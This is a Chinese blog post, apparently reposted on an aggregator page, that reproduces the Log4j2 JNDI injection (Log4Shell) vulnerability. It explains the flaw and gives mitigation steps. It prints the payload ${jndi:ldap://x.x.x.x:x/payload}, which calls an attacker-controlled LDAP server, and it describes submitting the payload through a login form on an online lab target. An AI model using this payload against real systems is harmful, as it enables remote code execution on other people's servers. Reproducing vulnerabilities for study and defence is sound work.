当前位置:首页 » 《随便一记》 » 正文

Apache Log4j2 远程代码执行漏洞复现_sorryagain的博客

15 人参与  2022年03月23日 13:08  分类 : 《随便一记》  评论

点击全文阅读


0x01 漏洞概述

Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但并未对输入进行严格的判断,从而造成攻击者可以在目标服务器上执行任意代码。

0x02 漏洞复现

环境搭建,引入log4j相关jar包,我这里使用的版本是2.14.1
在这里插入图片描述
编写调用Log4j的方法,即存在漏洞的代码,如下图
这里logger.erro方法的参数直接编码成了一个ldap的地址,该地址为攻击者的服务器,后面需要在该地址部署恶意文件
在正常业务场景中,logger.erro的参数可能是由用户输入的,程序运行过程中将输入的参数打印到日志中,便于分析和追溯
因此Payload即为${jndi:ldap://x.x.x.x:x/payload}
在这里插入图片描述
本地搭建LDAP服务和HTTP服务,并部署恶意代码,网上很多种工具和方法都可以,这里简单介绍一下LDAP
JDNI提供了一个目录系统,并将服务名称与对象关联起来,从而使得开发人员在开发过程中可以使用名称来访问对象。
而LDAP即轻量级目录访问协议,目录是一个为查询、浏览和搜索而优化的专业分布式数据库。
因此,当logger的方法里有${jndi:ldap://}时,Log4j就将会把它按照JNDI扩展内容去解析,并按照LDAP协议去指定的远程服务器请求对应的数据并解析。
在这里插入图片描述
在这里插入图片描述

运行刚刚编写的存在漏洞的方法,可以成功执行命令,本地弹出计算器
在这里插入图片描述
网上某漏洞靶场也可以成功执行命令
在这里插入图片描述登录框用户名写入Payload,VPS本地服务起监听,成功执行命令
在这里插入图片描述

0x03 修复建议

  1. 设置 JVM 启动参数 ‐Dlog4j2.formatMsgNoLookups=true
  2. 系统环境变量FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true
  3. 设置 log4j2.formatMsgNoLookups=True
  4. 尽量使用 JDK 版本大于11.0.1、8u191、7u201、6u211,需要注意的是,即使是使用 了 JDK 高版本也不能完全保证安全,依然存在本地绕过的情况。
  5. 限制不必要的业务访问外网。
  6. 采用 rasp 对 lookup 的调用进行阻断。
  7. 采用 waf 对请求流量中的 ${jndi 进行拦截。

点击全文阅读


本文链接:http://m.zhangshiyu.com/post/36568.html

漏洞  方法  服务  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • [糙汉嘴软心硬,娇妻日日晚起]小说精彩节选免费试读_「黎夏顾卫城」主线最终章倒计时
  • 我的亲妹妹我当做畜生,只有儿子来救我反转剧情试读片段_[***小宝李小翠]精彩章节免费试读
  • 往梦难复温,沈淮霆宋思予在线_往梦难复温,沈淮霆宋思予在线
  • 爱意清浅随风离(简凝夕陆靳燃),爱意清浅随风离
  • 「冲喜而已,侯爷别太爱」小说免费在线阅读_侯府侯爷乐瑶主线最终章倒计时
  • 好看的往梦难复温沈淮霆宋思予_往梦难复温沈淮霆宋思予
  • 天才京剧花旦被废嗓后成为芭蕾舞王+后续+结局(秦意宋笙)全书秦意宋笙结局_秦意宋笙+结局列表_笔趣阁(天才京剧花旦被废嗓后成为芭蕾舞王+后续+结局)
  • (番外)+(全书)往梦难复温(沈淮霆宋思予+番外+全书)_(往梦难复温+番外+全书)免费_笔趣阁(沈淮霆宋思予)
  • 江晚烟陆聿我终于失去了你结局+番外(江晚烟陆聿)列表_江晚烟陆聿我终于失去了你结局+番外(江晚烟陆聿)结局篇+番外在线
  • 池雾陆砚寒结局+番外(陆砚寒池雾)列表_池雾陆砚寒结局+番外(陆砚寒池雾)池雾陆砚寒结局+番外在线
  • 沈静怡傅励行+后续+结局(傅励行沈静怡)列表_沈静怡傅励行+后续+结局(傅励行沈静怡)沈静怡傅励行+后续+结局在线
  • 非典时,我被妻子的白月光误诊遗弃在病房节选角色羁绊特辑‌_田越苏雅白月光角色专属支线试读入口

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1